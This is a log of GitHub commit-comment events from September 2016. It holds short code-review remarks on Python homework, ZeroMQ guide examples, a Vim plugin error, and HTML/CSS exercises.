{"id":"4578524182","type":"CommitCommentEvent","actor":{"login":"J-o-s-h-S-i-m-s"},"repo":{"name":"J-o-s-h-S-i-m-s/3D-Gesture-Controlled-Arcade-Games"},"payload":{"comment":{"id":19066410,"position":null,"line":null,"path":null,"commit_id":"5e073113454f70f6b3a258cd880d33310cbfa054","created_at":"2016-09-17T19:30:09Z","updated_at":"2016-09-17T19:30:09Z","body":"I mistakenly did not change the name of this pull request. I prefer a more descriptive name than \"Merge pull request #2 from J-o-s-h-S-i-m-s/documents\", but I suppose it's too late."}},"created_at":"2016-09-17T19:30:09Z"}
{"id":"4578524866","type":"CommitCommentEvent","actor":{"login":"ttwo32"},"repo":{"name":"ptrimble/definitions"},"payload":{"comment":{"id":19066416,"position":5,"line":5,"path":"lib/validation/run.rb","commit_id":"8d99a1eeb663c886dea4a2d140219911bcff7175","created_at":"2016-09-17T19:30:33Z","updated_at":"2016-09-17T19:30:33Z","body":"👍 "}},"created_at":"2016-09-17T19:30:33Z"}
{"id":"4578526338","type":"CommitCommentEvent","actor":{"login":"sumeetb25"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":19066422,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-17T19:31:31Z","updated_at":"2016-09-17T19:31:31Z","body":"I get the same error on vim 7.4 and Ubuntu 14.04\r\n\r\n[Output of messages]\r\nMessages maintainer: Bram Moolenaar <Bram@vim.org>\r\n\"youcompleteme.py\" 699L, 25188C\r\nError detected while processing function youcompleteme#Enable..<SNR>14_OnBufferRead:\r\nline   17:\r\nE117: Unknown function: UltiSnips#SnippetsInCurrentScope\r\nError detected while processing function youcompleteme#Enable..<SNR>14_OnBufferRead:\r\nline   17:\r\nE15: Invalid expression: UltiSnips#SnippetsInCurrentScope( 1 )\r\n\r\nI tried using Exception instead of vim.error and still see the same error. \r\n\r\n[Vim version]\r\nsumeetb@u847beb1328d857c085be:~/.vim/bundle/YouCompleteMe$ vim --version | grep python\r\n+cryptv          +linebreak       +python          +viminfo\r\n+cscope          +lispindent      -python3         +vreplace\r\nLinking: gcc   -Wl,-Bsymbolic-functions -Wl,-z,relro -Wl,--as-needed -o vim        -lm -ltinfo -lnsl  -lselinux  -lacl -lattr -lgpm -ldl    -L/usr/lib/python2.7/config-x86_64-linux-gnu -lpython2.7 -lpthread -ldl -lutil -lm -Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions    \r\n\r\nThis errors disappear once I have UltiSnips installed. "}},"created_at":"2016-09-17T19:31:31Z"}
{"id":"4578526516","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066424,"position":7,"line":7,"path":"nathan-programming-puzzles-3-2.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-17T19:31:39Z","updated_at":"2016-09-17T19:31:39Z","body":"I usually keep my samurai in \"tunnels\" instead of \"tunnles\". :-)"}},"created_at":"2016-09-17T19:31:39Z"}
{"id":"4578527023","type":"CommitCommentEvent","actor":{"login":"thomasbeta"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066426,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T19:32:00Z","updated_at":"2016-09-17T19:32:00Z","body":"Ah cool 👀 👀 👀"}},"created_at":"2016-09-17T19:32:00Z"}
{"id":"4578527285","type":"CommitCommentEvent","actor":{"login":"pvlakshmi"},"repo":{"name":"pvlakshmi/ProgrammingAssignment2"},"payload":{"comment":{"id":19066427,"position":null,"line":null,"path":null,"commit_id":"828a5821c42c3f2f5d6aa0841f41a03ce6812365","created_at":"2016-09-17T19:32:10Z","updated_at":"2016-09-17T19:32:10Z","body":"\r\n[CacheMatrix.docx](https://github.com/pvlakshmi/ProgrammingAssignment2/files/478330/CacheMatrix.docx)\r\n\r\n"}},"created_at":"2016-09-17T19:32:10Z"}
{"id":"4578529477","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066431,"position":7,"line":7,"path":"nathan-programming-puzzles-3-3.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-17T19:33:45Z","updated_at":"2016-09-17T19:33:45Z","body":"This is a good example of how to combine strings.  The puzzle description asks you to use placeholders (see page 30)."}},"created_at":"2016-09-17T19:33:45Z"}
{"id":"4578529626","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19066432,"position":33,"line":41,"path":"index.js","commit_id":"65d5fc9b14e7778871b189d65c07316273014c0c","created_at":"2016-09-17T19:33:51Z","updated_at":"2016-09-17T19:33:51Z","body":"Return early when there's nothing to do."}},"created_at":"2016-09-17T19:33:51Z"}
{"id":"4578530142","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19066435,"position":null,"line":null,"path":null,"commit_id":"2c8551756bd884dd78d99893aa3ce10856169c01","created_at":"2016-09-17T19:34:12Z","updated_at":"2016-09-17T19:34:12Z","body":"Thank you! I thought I was crazy."}},"created_at":"2016-09-17T19:34:12Z"}
{"id":"4578531063","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066438,"position":41,"line":41,"path":"nathan-programming-puzzles-4-1-2-3.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-17T19:34:49Z","updated_at":"2016-09-17T19:34:49Z","body":"These all look great!"}},"created_at":"2016-09-17T19:34:49Z"}
{"id":"4578532736","type":"CommitCommentEvent","actor":{"login":"f-knorr"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19066448,"position":7,"line":6,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"6a5d9f4fbbae626a4eded9dadb9f1c043535e3f8","created_at":"2016-09-17T19:35:57Z","updated_at":"2016-09-17T19:35:57Z","body":"You are right. I was aware of this limitation, but I considered it to be ok, as there are many nonsense hyphenated words which are accepted by LT (e.g., \"Nachthundebettschule\"). \r\nWith my very recent commit, however, I have fixed that issue. \"Helizitätoperator\" is no longer accepted. (Indeed, the logic is a little bit more complex.)"}},"created_at":"2016-09-17T19:35:57Z"}
{"id":"4578532890","type":"CommitCommentEvent","actor":{"login":"cl0ne"},"repo":{"name":"AlexBoliachiy/register"},"payload":{"comment":{"id":19066449,"position":1,"line":19,"path":".idea/workspace.xml","commit_id":"d5f3bc9070d4492aa36137483aadcf0a786927c1","created_at":"2016-09-17T19:36:04Z","updated_at":"2016-09-17T19:36:04Z","body":".idea better to leave in ignored files (look for .gitignore, later I suggested Igor resolution)"}},"created_at":"2016-09-17T19:36:04Z"}
{"id":"4578533180","type":"CommitCommentEvent","actor":{"login":"tomkralidis"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":19066452,"position":null,"line":null,"path":null,"commit_id":"620e521f44504d8bb73f9fde9dea29ec3c0a3336","created_at":"2016-09-17T19:36:16Z","updated_at":"2016-09-17T19:36:16Z","body":"While we're at it we can set this to `'hypermap.search.pycsw_local_mappings'`."}},"created_at":"2016-09-17T19:36:16Z"}
{"id":"4578533493","type":"CommitCommentEvent","actor":{"login":"hintjens"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19066453,"position":18,"line":18,"path":"examples/C/pathosub.c","commit_id":"6868ee254fa49bd0afe40ace10e9388a87f68c59","created_at":"2016-09-17T19:36:26Z","updated_at":"2016-09-17T19:36:26Z","body":"Dunno, don't have the code in front of me (on my phone). Could be randomly\ninitialised to zeroes?\n\nOn 17 Sep 2016 9:29 pm, \"Patrik Wenger\" <notifications@github.com> wrote:\n\n> I'm wondering, what happens to the remaining 2 bytes in the subscription\n> char array? Isn't that garbage and stays garbage because sprintf only\n> prints 3 characters?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/booksbyus/zguide/commit/6868ee254fa49bd0afe40ace10e9388a87f68c59#commitcomment-19066398>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASzCPHz_tq2EUHmn11tvn6raSWhuBkLks5qrD-DgaJpZM4J_sMG>\n> .\n>\n"}},"created_at":"2016-09-17T19:36:26Z"}
{"id":"4578533806","type":"CommitCommentEvent","actor":{"login":"4re"},"repo":{"name":"4re/vapoursynth-portage"},"payload":{"comment":{"id":19066454,"position":19,"line":19,"path":"media-plugins/vapoursynth-qrcodesource/vapoursynth-qrcodesource-9999.ebuild","commit_id":"2afc0a246a54ea7cef48285fbd16804ad663488c","created_at":"2016-09-17T19:36:40Z","updated_at":"2016-09-17T19:36:40Z","body":"I didn't even notice, but anyway, it's not obvious to me how to make the build system understand I want to use systems lib and that's not needed to use the internal version.\r\n\r\nThere is also the fact the repo for the Vapoursynth's plug-in uses a custom commit two months newer than the one available in Gentoo's repos.\r\n\r\nPatches are welcome if you are committed to make sure the plug-in will work properly (most probably it will)."}},"created_at":"2016-09-17T19:36:40Z"}
{"id":"4578533817","type":"CommitCommentEvent","actor":{"login":"ttwo32"},"repo":{"name":"ptrimble/definitions"},"payload":{"comment":{"id":19066455,"position":1,"line":1,"path":"spec/validation/definition_validator_spec.rb","commit_id":"8d99a1eeb663c886dea4a2d140219911bcff7175","created_at":"2016-09-17T19:36:40Z","updated_at":"2016-09-17T19:36:40Z","body":"Great.I like RSpec. So i agree to writing RSpec codes."}},"created_at":"2016-09-17T19:36:40Z"}
{"id":"4578534537","type":"CommitCommentEvent","actor":{"login":"tigerw"},"repo":{"name":"koesie10/LuaSerializer"},"payload":{"comment":{"id":19066457,"position":44,"line":242,"path":"tests/LuaParserTest.php","commit_id":"66870e84fae2ae56b0eb42bf8622792602a446ea","created_at":"2016-09-17T19:37:06Z","updated_at":"2016-09-17T19:37:06Z","body":"Aw, thanks :) You didn't need to, the assignment really is just a Cuberite-specific thing."}},"created_at":"2016-09-17T19:37:06Z"}
{"id":"4578534801","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066458,"position":37,"line":37,"path":"nathan-programming-puzzles-5-2.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-17T19:37:18Z","updated_at":"2016-09-17T19:37:18Z","body":"Looks good."}},"created_at":"2016-09-17T19:37:18Z"}
{"id":"4578536156","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19066462,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-17T19:38:16Z","updated_at":"2016-09-17T19:38:16Z","body":"As far as I can see, `self` is a fresh `kvmsg_t`, either initialized with garbage (I guess that's what `zmalloc` does) or all zeroes. Either way, this condition seems weird to me. Can't trust the data in there, so there shouldn't be any message to close, right? Sorry if I'm wrong. Been studying the code in RRR and Reliable Pub-Sub examples the last 10 days."}},"created_at":"2016-09-17T19:38:16Z"}
{"id":"4578537161","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066463,"position":15,"line":15,"path":"nathan-programming-puzzles-5-3.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-17T19:38:55Z","updated_at":"2016-09-17T19:38:55Z","body":"Good."}},"created_at":"2016-09-17T19:38:55Z"}
{"id":"4578537255","type":"CommitCommentEvent","actor":{"login":"BuIlDaLiBlE"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":19066464,"position":null,"line":null,"path":null,"commit_id":"c0a2cf8c2d5d01b3a56c7ecb7cbb781e381819c2","created_at":"2016-09-17T19:39:00Z","updated_at":"2016-09-17T19:39:00Z","body":"Mmmmm."}},"created_at":"2016-09-17T19:39:00Z"}
{"id":"4578539815","type":"CommitCommentEvent","actor":{"login":"dngirich"},"repo":{"name":"dngirich/java-lab"},"payload":{"comment":{"id":19066471,"position":4,"line":11,"path":".gitignore","commit_id":"fdc02d6c1fa8958a42fb82dc4de0dc0e826dce7c","created_at":"2016-09-17T19:40:43Z","updated_at":"2016-09-17T19:40:43Z","body":"test"}},"created_at":"2016-09-17T19:40:43Z"}
{"id":"4578540478","type":"CommitCommentEvent","actor":{"login":"hintjens"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19066475,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-17T19:41:10Z","updated_at":"2016-09-17T19:41:10Z","body":"Ah, zmalloc always inialises to zero (hence the 'z')...\n\nOn 17 Sep 2016 9:38 pm, \"Patrik Wenger\" <notifications@github.com> wrote:\n\n> As far as I can see, self is a fresh kvmsg_t, either initialized with\n> garbage (I guess that's what zmalloc does) or all zeroes. Either way,\n> this condition seems weird to me. Can't trust the data in there, so there\n> shouldn't be any message to close, right? Sorry if I'm wrong. Been studying\n> the code in RRR and Reliable Pub-Sub examples the last 10 days.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/booksbyus/zguide/commit/fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed#commitcomment-19066462>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASzCIVcWluUYMOWYZccgBphc-70_5ypks5qrEGpgaJpZM4J_sVY>\n> .\n>\n"}},"created_at":"2016-09-17T19:41:10Z"}
{"id":"4578541665","type":"CommitCommentEvent","actor":{"login":"psychofad"},"repo":{"name":"gigabit101/QuantumStorage"},"payload":{"comment":{"id":19066481,"position":null,"line":null,"path":null,"commit_id":"d7c9ec875926aabc971c08969a6ea1368814e878","created_at":"2016-09-17T19:42:00Z","updated_at":"2016-09-17T19:42:00Z","body":"yeah, it's fine, just wanted you to be aware for the next update :D"}},"created_at":"2016-09-17T19:42:00Z"}
{"id":"4578543091","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"shurcooL/Go-Package-Store"},"payload":{"comment":{"id":19066485,"position":null,"line":null,"path":null,"commit_id":"2e0d1eeea888947f677fc9092434b2bceea4b61d","created_at":"2016-09-17T19:42:58Z","updated_at":"2016-09-17T19:42:58Z","body":"> I'm not aware of anyone outside Azul3D using the semver package, and we moved off of it when we migrated everything to `azul3d.org/engine` (unversioned import paths), so I think that there is a good likelyhood that G-P-S does not need to worry about versioned azul3d import paths at all anymore.\r\n\r\nI'm happy to support azul3d.org needs, but if it no longer needs this, removing it is best. This semver matcher is configured specifically for azul3d.org only – it's not a generic one. See:\r\n\r\n```Go\r\nvar azul3dOrgMatcher = semver.GitHub(\"azul3d\")\r\n```\r\n\r\n> Maybe just remove support for it entirely?\r\n\r\nSGTM."}},"created_at":"2016-09-17T19:42:58Z"}
{"id":"4578543508","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066486,"position":null,"line":null,"path":null,"commit_id":"19f7d0f9e9edcb536180610e0c5745cd98add018","created_at":"2016-09-17T19:43:14Z","updated_at":"2016-09-17T19:43:14Z","body":"Much better."}},"created_at":"2016-09-17T19:43:14Z"}
{"id":"4578544507","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066491,"position":15,"line":10,"path":"nathan-programming-puzzles-5-4.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:43:57Z","updated_at":"2016-09-17T19:43:57Z","body":"Why did you change your good code back to the bad solution?"}},"created_at":"2016-09-17T19:43:57Z"}
{"id":"4578544546","type":"CommitCommentEvent","actor":{"login":"marun"},"repo":{"name":"marun/origin"},"payload":{"comment":{"id":19066492,"position":4,"line":75,"path":"test/cmd/admin.sh","commit_id":"148de23ea2826d4e260e4bad33e041564b32463e","created_at":"2016-09-17T19:43:59Z","updated_at":"2016-09-17T19:43:59Z","body":"Done (in #10971)"}},"created_at":"2016-09-17T19:43:59Z"}
{"id":"4578544569","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19066493,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-17T19:43:59Z","updated_at":"2016-09-17T19:43:59Z","body":"Should be good with 29d9ed9."}},"created_at":"2016-09-17T19:43:59Z"}
{"id":"4578545654","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19066497,"position":40,"line":16,"path":"00-HTML-CSS-basics/CSS/index.html","commit_id":"fa88e8accf5b5f74fe094cc74932245310a1800f","created_at":"2016-09-17T19:44:41Z","updated_at":"2016-09-17T19:44:41Z","body":"why did you add these classes if you are not using them in the css?"}},"created_at":"2016-09-17T19:44:41Z"}
{"id":"4578545896","type":"CommitCommentEvent","actor":{"login":"schnittstabil"},"repo":{"name":"sindresorhus/pify"},"payload":{"comment":{"id":19066498,"position":33,"line":41,"path":"index.js","commit_id":"65d5fc9b14e7778871b189d65c07316273014c0c","created_at":"2016-09-17T19:44:49Z","updated_at":"2016-09-17T19:44:49Z","body":"There's a better way to do that https://github.com/sindresorhus/pify/commit/1293901b6512c0fc486b587f7cff185b3e0702bd#diff-168726dbe96b3ce427e7fedce31bb0bcR55 :grin: "}},"created_at":"2016-09-17T19:44:49Z"}
{"id":"4578547967","type":"CommitCommentEvent","actor":{"login":"malikjozane"},"repo":{"name":"manojmj92/subtitle-downloader"},"payload":{"comment":{"id":19066508,"position":null,"line":null,"path":null,"commit_id":"21fbe3e3a436dc1e232698b94e3c799365728149","created_at":"2016-09-17T19:46:13Z","updated_at":"2016-09-17T19:46:13Z","body":"**For mac users:**\r\nRequests and bs4 are not a built in module, so you will have to download it. This is why it may create problem. I had the problem with my mac.\r\nhttps://pypi.python.org/pypi/requests\r\nhttps://pypi.python.org/pypi/bs4\r\n\r\nA more detailed guide can be found here: http://stackoverflow.com/questions/17309288/importerror-no-module-named-requests"}},"created_at":"2016-09-17T19:46:13Z"}
{"id":"4578548253","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066510,"position":8,"line":8,"path":"nathan-programming-puzzles-6-2.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:46:24Z","updated_at":"2016-09-17T19:46:24Z","body":"This handles the even age case.  What about odd ages?"}},"created_at":"2016-09-17T19:46:24Z"}
{"id":"4578548847","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066514,"position":6,"line":6,"path":"nathan-programming-puzzles-6-2.py~","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:46:43Z","updated_at":"2016-09-17T19:46:43Z","body":"Usually we don't check in the .py~ files."}},"created_at":"2016-09-17T19:46:43Z"}
{"id":"4578548893","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19066515,"position":5,"line":1,"path":"00-HTML-CSS-basics/CSS/style.css","commit_id":"fa88e8accf5b5f74fe094cc74932245310a1800f","created_at":"2016-09-17T19:46:44Z","updated_at":"2016-09-17T19:46:44Z","body":"I think this rule is not needed. Can you remove it?"}},"created_at":"2016-09-17T19:46:44Z"}
{"id":"4578550493","type":"CommitCommentEvent","actor":{"login":"Moondancer83"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19066525,"position":6,"line":8,"path":"src/characters.html","commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-17T19:47:29Z","updated_at":"2016-09-17T19:47:29Z","body":"Use lower-/camelcase filenames in general."}},"created_at":"2016-09-17T19:47:29Z"}
{"id":"4578551469","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19066527,"position":null,"line":null,"path":null,"commit_id":"f3691566b762f7d9848311521f747c9e0f4856d8","created_at":"2016-09-17T19:48:01Z","updated_at":"2016-09-17T19:48:01Z","body":"It depends of your weight. ;)"}},"created_at":"2016-09-17T19:48:01Z"}
{"id":"4578551803","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19066530,"position":1,"line":1,"path":"00-HTML-CSS-basics/CSS/style.css","commit_id":"fa88e8accf5b5f74fe094cc74932245310a1800f","created_at":"2016-09-17T19:48:15Z","updated_at":"2016-09-17T19:48:15Z","body":"Looks good. Good job!"}},"created_at":"2016-09-17T19:48:15Z"}
{"id":"4578552939","type":"CommitCommentEvent","actor":{"login":"Moondancer83"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19066531,"position":9,"line":11,"path":"src/characters.html","commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-17T19:49:06Z","updated_at":"2016-09-17T19:49:06Z","body":"JQuery should precede bootstrap.js"}},"created_at":"2016-09-17T19:49:06Z"}
{"id":"4578553109","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066533,"position":6,"line":6,"path":"nathan-programming-puzzles-6-4.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:49:13Z","updated_at":"2016-09-17T19:49:13Z","body":"Chapter 6 puzzles look good."}},"created_at":"2016-09-17T19:49:13Z"}
{"id":"4578553233","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":19066534,"position":null,"line":null,"path":null,"commit_id":"8fd2096bace8c470615f31b1e20db4cf078ce0ce","created_at":"2016-09-17T19:49:18Z","updated_at":"2016-09-17T19:49:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;te3WuwDO&#x2F;26-passer-la-transformation-avant-import-en-mode-jbj-inject\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Passer la transformation avant import  en mode JBJ.inject</a>"}},"created_at":"2016-09-17T19:49:18Z"}
{"id":"4578553950","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19066539,"position":null,"line":null,"path":null,"commit_id":"4850644ec9f6aeb59ba6367cefced9b7393ae313","created_at":"2016-09-17T19:49:49Z","updated_at":"2016-09-17T19:49:49Z","body":"yes!good XD"}},"created_at":"2016-09-17T19:49:49Z"}
{"id":"4578554069","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":19066540,"position":null,"line":null,"path":null,"commit_id":"fa4e00243282a74b0add469c7f1e57a6421c1b40","created_at":"2016-09-17T19:49:54Z","updated_at":"2016-09-17T19:49:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;te3WuwDO&#x2F;26-passer-la-transformation-avant-import-en-mode-jbj-inject\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Passer la transformation avant import  en mode JBJ.inject</a>"}},"created_at":"2016-09-17T19:49:54Z"}
{"id":"4578554757","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066545,"position":12,"line":12,"path":"nathan-programming-puzzles-7-1.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:50:22Z","updated_at":"2016-09-17T19:50:22Z","body":"This has the right idea, but it doesn't run for me."}},"created_at":"2016-09-17T19:50:22Z"}
{"id":"4578554831","type":"CommitCommentEvent","actor":{"login":"Moondancer83"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19066546,"position":12,"line":13,"path":"src/characters.html","commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-17T19:50:25Z","updated_at":"2016-09-17T19:50:25Z","body":"This syntax is invalid and nof needed. You only need the empty script tag here."}},"created_at":"2016-09-17T19:50:25Z"}
{"id":"4578555244","type":"CommitCommentEvent","actor":{"login":"JohnGilb"},"repo":{"name":"Team488/SeriouslyCommonLib"},"payload":{"comment":{"id":19066548,"position":null,"line":null,"path":null,"commit_id":"2d7424451f95e210f81288f764ac3d8cf0b4fffd","created_at":"2016-09-17T19:50:41Z","updated_at":"2016-09-17T19:50:41Z","body":"As regards to the CAN Talon approach - I think eventually we will want to have an interface that exposes common CAN Talon control on Subsystems, so we can keep the logic that controls them in Commands instead of subsystems."}},"created_at":"2016-09-17T19:50:41Z"}
{"id":"4578555810","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066551,"position":13,"line":13,"path":"nathan-programming-puzzles-7-2.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:51:08Z","updated_at":"2016-09-17T19:51:08Z","body":"Again it doesn't run for me.  It's a simple fix...."}},"created_at":"2016-09-17T19:51:08Z"}
{"id":"4578556212","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066554,"position":14,"line":14,"path":"nathan-programming-puzzles-7-3.py","commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:51:27Z","updated_at":"2016-09-17T19:51:27Z","body":"Also doesn't run."}},"created_at":"2016-09-17T19:51:27Z"}
{"id":"4578556774","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19066559,"position":44,"line":12,"path":"00-HTML-CSS-basics/CSS/style.css","commit_id":"fa88e8accf5b5f74fe094cc74932245310a1800f","created_at":"2016-09-17T19:51:55Z","updated_at":"2016-09-17T19:51:55Z","body":"Avoid tag selectors!"}},"created_at":"2016-09-17T19:51:55Z"}
{"id":"4578556876","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066560,"position":null,"line":null,"path":null,"commit_id":"fb0b366e7d8284ce91c84ab0095a6621192cd83b","created_at":"2016-09-17T19:51:59Z","updated_at":"2016-09-17T19:51:59Z","body":"Chapter 7 files have an issue.  I bet it won't take you long to fix it!"}},"created_at":"2016-09-17T19:51:59Z"}
{"id":"4578559830","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066578,"position":27,"line":27,"path":"nathan-programming-puzzles-8-1.py","commit_id":"ed144e444da3730bc5377e25b25abbf63def8f5b","created_at":"2016-09-17T19:54:03Z","updated_at":"2016-09-17T19:54:03Z","body":"I didn't know nathan was a giraffe!  Otherwise this looks perfect."}},"created_at":"2016-09-17T19:54:03Z"}
{"id":"4578560486","type":"CommitCommentEvent","actor":{"login":"Moondancer83"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19066584,"position":14,"line":41,"path":"src/index.html","commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-17T19:54:28Z","updated_at":"2016-09-17T19:54:28Z","body":"This the place of thd brand name. Revert this change."}},"created_at":"2016-09-17T19:54:28Z"}
{"id":"4578560977","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066589,"position":38,"line":38,"path":"nathan-programming-puzzles-8-2.py","commit_id":"ed144e444da3730bc5377e25b25abbf63def8f5b","created_at":"2016-09-17T19:54:49Z","updated_at":"2016-09-17T19:54:49Z","body":"Excellent!  Fun to watch."}},"created_at":"2016-09-17T19:54:49Z"}
{"id":"4578561345","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19066591,"position":null,"line":null,"path":null,"commit_id":"ed144e444da3730bc5377e25b25abbf63def8f5b","created_at":"2016-09-17T19:55:05Z","updated_at":"2016-09-17T19:55:05Z","body":"Chapter 8 looks great!"}},"created_at":"2016-09-17T19:55:05Z"}
{"id":"4578562526","type":"CommitCommentEvent","actor":{"login":"araghunde"},"repo":{"name":"araghunde/ds"},"payload":{"comment":{"id":19066599,"position":137,"line":205,"path":"ds_git/src/ejercicio1/Rectangulo.java","commit_id":"e479a26452707ed75e0553b22178ebd75e6fbdac","created_at":"2016-09-17T19:55:57Z","updated_at":"2016-09-17T19:55:57Z","body":"this is amazing 💯 "}},"created_at":"2016-09-17T19:55:57Z"}
{"id":"4578562619","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19066600,"position":null,"line":null,"path":null,"commit_id":"b2c97492ef5b9d0978f8983ab31bd6f6626fe6ba","created_at":"2016-09-17T19:56:00Z","updated_at":"2016-09-17T19:56:00Z","body":"@lordloki : Is what i though about. What's your opinion ?"}},"created_at":"2016-09-17T19:56:00Z"}
